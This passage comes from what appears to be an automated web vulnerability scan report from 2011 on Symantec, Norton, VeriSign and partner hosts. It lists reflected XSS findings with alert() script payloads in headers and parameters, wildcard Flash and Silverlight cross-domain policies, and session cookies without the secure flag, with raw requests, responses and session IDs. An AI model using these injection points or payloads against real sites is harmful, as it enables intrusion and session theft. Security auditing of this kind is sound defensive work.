Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 73
Expires: Fri, 09 Sep 2011 21:33:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:33:43 GMT
Connection: close
Vary: Accept-Encoding

{ "query":"xss6b734<script>alert(1)</script>b1904ad5262", "results": [] }
3.35. https://cert.webtrust.org/ViewSeal [Referer HTTP header]
Summary
Severity: Low
Confidence: Certain
Host: https://cert.webtrust.org
Path: /ViewSeal
Issue detail
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 3e394<script>alert(1)</script>ae07fae4fa3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ViewSeal?id=304 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3e394<script>alert(1)</script>ae07fae4fa3
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:37 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 258

<html>
<head>
<title>Web Trust</title>
<link rel="stylesheet" href="/admin.css" type="text/css">
</head>
<body>
Invalid domain [http://www.google.com/search?hl=en&q=3e394<script>alert(1)</script>ae07fae4fa3]: please contact your practitioner.</body>...[SNIP]...
4. Flash cross-domain policy
There are 18 instances of this issue:
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user. Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
4.1. http://ak.c.ooyala.com/crossdomain.xml
Summary
Severity: High
Confidence: Certain
Host: http://ak.c.ooyala.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ak.c.ooyala.com
Response
HTTP/1.0 200 OK
x-amz-id-2: KN3pSbRmPOnrtBbaZkJNn0JMK9l3niD957+u/ulcUqm9Ba/xmDtCsu4+ok1rK7GJ
x-amz-request-id: 46F7B2194FCF4B8A
Last-Modified: Mon, 12 Jan 2009 21:58:46 GMT
ETag: "124fa42a56284acbe74862f0024af4f3"
Content-Type: text/x-cross-domain-policy
Content-Length: 157
Server: AmazonS3
Cache-Control: max-age=604800
Date: Fri, 09 Sep 2011 21:26:10 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>
4.2. http://cp76677.edgefcs.net/crossdomain.xml
Summary
Severity: High
Confidence: Certain
Host: http://cp76677.edgefcs.net
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1
Host: cp76677.edgefcs.net
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 187
Server: FlashCom/3.5.6
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>
4.3. http://mbox3.offermatica.com/crossdomain.xml
Summary
Severity: High
Confidence: Certain
Host: http://mbox3.offermatica.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: mbox3.offermatica.com
Response
HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Fri, 09 Sep 2011 21:24:35 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>...[SNIP]...
4.4. http://om.symantec.com/crossdomain.xml
Summary
Severity: High
Confidence: Certain
Host: http://om.symantec.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: om.symantec.com
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:11 GMT
Server: Omniture DC/2.0.0
xserver: www500
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
4.5. http://player.ooyala.com/crossdomain.xml
Summary
Severity: High
Confidence: Certain
Host: http://player.ooyala.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: player.ooyala.com
Response
HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 06 Sep 2011 23:02:21 GMT
X-Ooyala-Server-Id: i-2a1c3f45
Content-Type: text/x-cross-domain-policy
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 319
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />...[SNIP]...
<allow-access-from domain="*" />...[SNIP]...
4.6. https://symantec-corporation.com/crossdomain.xml
Summary
Severity: High
Confidence: Certain
Host: https://symantec-corporation.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: symantec-corporation.com
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:30 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 01:45:45 GMT
ETag: "4500fc-148-486e89dcf8440"
Accept-Ranges: bytes
Content-Length: 328
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for Responsys, Inc. Last edit $Date: 2010-05-18 18:42:54...[SNIP]...
<allow-access-from domain="*" secure="false" />...[SNIP]...
4.7. http://symantec.tt.omtrdc.net/crossdomain.xml
Summary
Severity: High
Confidence: Certain
Host: http://symantec.tt.omtrdc.net
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: symantec.tt.omtrdc.net
Response
HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Fri, 09 Sep 2011 21:30:59 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>...[SNIP]...
4.8. http://ch.norton.com/crossdomain.xml
Summary
Severity: Low
Confidence: Certain
Host: http://ch.norton.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: ch.norton.com
Response
HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 436
Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT
ETag: "1b4-4cae4fc0"
Accept-Ranges: bytes
Content-Type: text/xml;charset=UTF-8
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:41:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.brightcove.com"/>...[SNIP]...
4.9. http://l.player.ooyala.com/crossdomain.xml
Summary
Severity: Low
Confidence: Certain
Host: http://l.player.ooyala.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.1
Host: l.player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Fri, 09 Sep 2011 21:26:09 GMT
Content-Type: text/x-cross-domain-policy
Connection: close
Cache-Control: max-age=3600, private
Content-Length: 330

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />...[SNIP]...
<allow-access-from domain="*.ooyala.com" />...[SNIP]...
4.10. http://us.norton.com/crossdomain.xml
Summary
Severity: Low
Confidence: Certain
Host: http://us.norton.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: us.norton.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 436 Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT ETag: "1b4-4cae4fc0" Accept-Ranges: bytes Content-Type: text/xml Cache-Control: public, max-age=2748 Date: Fri, 09 Sep 2011 21:30:57 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!--File added for Flash apps--> <cross-domain-policy> <allow-access-from domain="*.symantec.com "/> <allow-access-from domain="*.norton.com "/> <allow-access-from domain="*.symantecstore.com "/> <allow-access-from domain="*.nortonopscenter.com "/> <allow-access-from domain="*.brightcove.com "/>...[SNIP]...
4.11. https://us.norton.com/crossdomain.xml
Summary
Severity: Low
Confidence: Certain
Host: https://us.norton.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: us.norton.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 436 Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT ETag: "1b4-4cae4fc0" Accept-Ranges: bytes Content-Type: text/xml Date: Fri, 09 Sep 2011 21:47:32 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!--File added for Flash apps--> <cross-domain-policy> <allow-access-from domain="*.symantec.com "/> <allow-access-from domain="*.norton.com "/> <allow-access-from domain="*.symantecstore.com "/> <allow-access-from domain="*.nortonopscenter.com "/> <allow-access-from domain="*.brightcove.com "/>...[SNIP]...
4.12. https://www-secure.symantec.com/crossdomain.xml
Summary
Severity: Low
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www-secure.symantec.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT ETag: "22a-4b03330b" Content-Type: text/xml Date: Fri, 09 Sep 2011 21:47:32 GMT Content-Length: 554 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!--File added for Flash apps--> <cross-domain-policy> <allow-access-from domain="*.symantec.com "/> <allow-access-from domain="*.norton.com "/> <allow-access-from domain="*.symantecstore.com "/> <allow-access-from domain="*.nortonopscenter.com "/> <allow-access-from domain="*.securityprofessional.com "/> <allow-access-from domain="*.securitydash.com "/> <allow-access-from domain="*.brightcove.com "/>...[SNIP]...
4.13. http://www.symantec.com/crossdomain.xml
Summary
Severity: Low
Confidence: Certain
Host: http://www.symantec.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.symantec.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT ETag: "22a-4b03330b" Content-Type: text/xml Cache-Control: public, max-age=2498 Date: Fri, 09 Sep 2011 21:26:10 GMT Content-Length: 554 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!--File added for Flash apps--> <cross-domain-policy> <allow-access-from domain="*.symantec.com "/> <allow-access-from domain="*.norton.com "/> <allow-access-from domain="*.symantecstore.com "/> <allow-access-from domain="*.nortonopscenter.com "/> <allow-access-from domain="*.securityprofessional.com "/> <allow-access-from domain="*.securitydash.com "/> <allow-access-from domain="*.brightcove.com "/>...[SNIP]...
4.14. http://1168.ic-live.com/crossdomain.xml
Summary
Severity: Information
Confidence: Certain
Host: http://1168.ic-live.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific other domains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: 1168.ic-live.com
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Thu, 17 Mar 2011 17:54:57 GMT ETag: "8045c-1c8-49eb15c03de40" Accept-Ranges: bytes Content-Length: 456 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml" Content-Type: text/xml X-Cache: MISS from i2a-coll-20 X-Cache-Lookup: MISS from i2a-coll-20:80 Via: 1.0 i2a-coll-20:80 (squid/2.6.STABLE21) Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master...[SNIP]... <allow-access-from domain="ecdev1.avery.com " secure="false" />...[SNIP]... <allow-access-from domain="ecdev1.averysignaturebinders.com " secure="false" />...[SNIP]... <allow-access-from domain="www.averysignaturebinders.com " secure="false" />...[SNIP]...
4.15. https://drh.img.digitalriver.com/crossdomain.xml
Summary
Severity: Information
Confidence: Certain
Host: https://drh.img.digitalriver.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific subdomains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: drh.img.digitalriver.com
Response
HTTP/1.0 200 OK ETag: "da-4ae73ece" Content-Type: text/xml Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=66808035819,0) Last-Modified: Tue, 27 Oct 2009 18:41:18 GMT Content-Length: 218 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc1app72 Accept-Ranges: bytes Date: Fri, 09 Sep 2011 21:41:50 GMT Connection: close <?xml version="1.0"?> <!-- http://www.adobe.com/crossdomain.xml --> <cross-domain-policy> <allow-access-from domain="gc.digitalriver.com " /> <allow-access-from domain="cx.digitalriver.com " /> </cr...[SNIP]...
4.16. http://twitter.com/crossdomain.xml
Summary
Severity: Information
Confidence: Certain
Host: http://twitter.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific subdomains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: twitter.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:05:29 GMT Server: Apache Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT Accept-Ranges: bytes Content-Length: 561 Cache-Control: max-age=1800 Expires: Fri, 09 Sep 2011 22:35:29 GMT Vary: Accept-Encoding X-XSS-Protection: 1; mode=block Connection: close Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd"> <al...[SNIP]... <allow-access-from domain="api.twitter.com " /> <allow-access-from domain="search.twitter.com " /> <allow-access-from domain="static.twitter.com " />...[SNIP]...
4.17. http://www.verisign.com/crossdomain.xml
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific subdomains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:38 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT Accept-Ranges: bytes Content-Length: 213 Expires: Sun, 09 Oct 2011 21:24:38 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="cdn.verisign.com "/> </cross-d...[SNIP]...
4.18. https://www.verisign.com/crossdomain.xml
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific subdomains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:45 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT Accept-Ranges: bytes Content-Length: 213 Expires: Sun, 09 Oct 2011 21:27:45 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="cdn.verisign.com "/> </cross-d...[SNIP]...
5. Silverlight cross-domain policy
There are 2 instances of this issue:
Issue background
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user. Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
5.1. http://om.symantec.com/clientaccesspolicy.xml
Summary
Severity: High
Confidence: Certain
Host: http://om.symantec.com
Path: /clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: om.symantec.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:11 GMT Server: Omniture DC/2.0.0 xserver: www627 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="* " /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </...[SNIP]...
5.2. http://player.ooyala.com/clientaccesspolicy.xml
Summary
Severity: High
Confidence: Certain
Host: http://player.ooyala.com
Path: /clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: player.ooyala.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 03 Aug 2011 01:50:51 GMT X-Ooyala-Server-Id: i-78a24c19 Content-Type: text/xml Date: Fri, 09 Sep 2011 21:26:10 GMT Content-Length: 362 Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-methods="*" http-request-headers="*"> <domain uri="* "/> </allow-fr...[SNIP]...
6. SSL cookie without secure flag set
There are 67 instances of this issue:
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
6.1. https://admin.instantservice.com/Customer
Summary
Severity: Medium
Confidence: Firm
Host: https://admin.instantservice.com
Path: /Customer
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Customer HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:36:51 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices Location: https://admin.instantservice.com/customerclient_error.html?null Content-Length: 0 P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8
6.2. https://admin.instantservice.com/links/5851/14753
Summary
Severity: Medium
Confidence: Firm
Host: https://admin.instantservice.com
Path: /links/5851/14753
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/14753 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:49 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5905 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales U...[SNIP]...
6.3. https://admin.instantservice.com/links/5851/16144
Summary
Severity: Medium
Confidence: Firm
Host: https://admin.instantservice.com
Path: /links/5851/16144
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
